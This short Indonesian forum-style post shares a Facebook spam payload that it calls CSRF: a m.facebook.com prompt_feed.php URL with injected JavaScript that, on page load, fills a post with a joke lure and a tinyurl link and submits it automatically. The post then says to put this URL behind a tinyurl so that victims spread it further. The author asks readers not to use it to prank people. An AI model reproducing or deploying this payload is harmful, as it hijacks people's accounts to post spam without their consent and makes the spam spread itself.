Sharing, ini Javascript fb yg berupa spam trsb. Berikut adalah script CSRF yang digunakan (Mohon jangan dipakai untuk ngerjain orang):

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt'window.onload=function(){document.forms[0].messag

e.value='jangan salahin w ...kalo lo bakal ngakak ngeliat ni orang :D http://tinyurl.com/sampahh';document.forms[0].submit();}&gzip=yes&http=1.1

lalu di tiny url tinggal di buat link ke script diatas. :)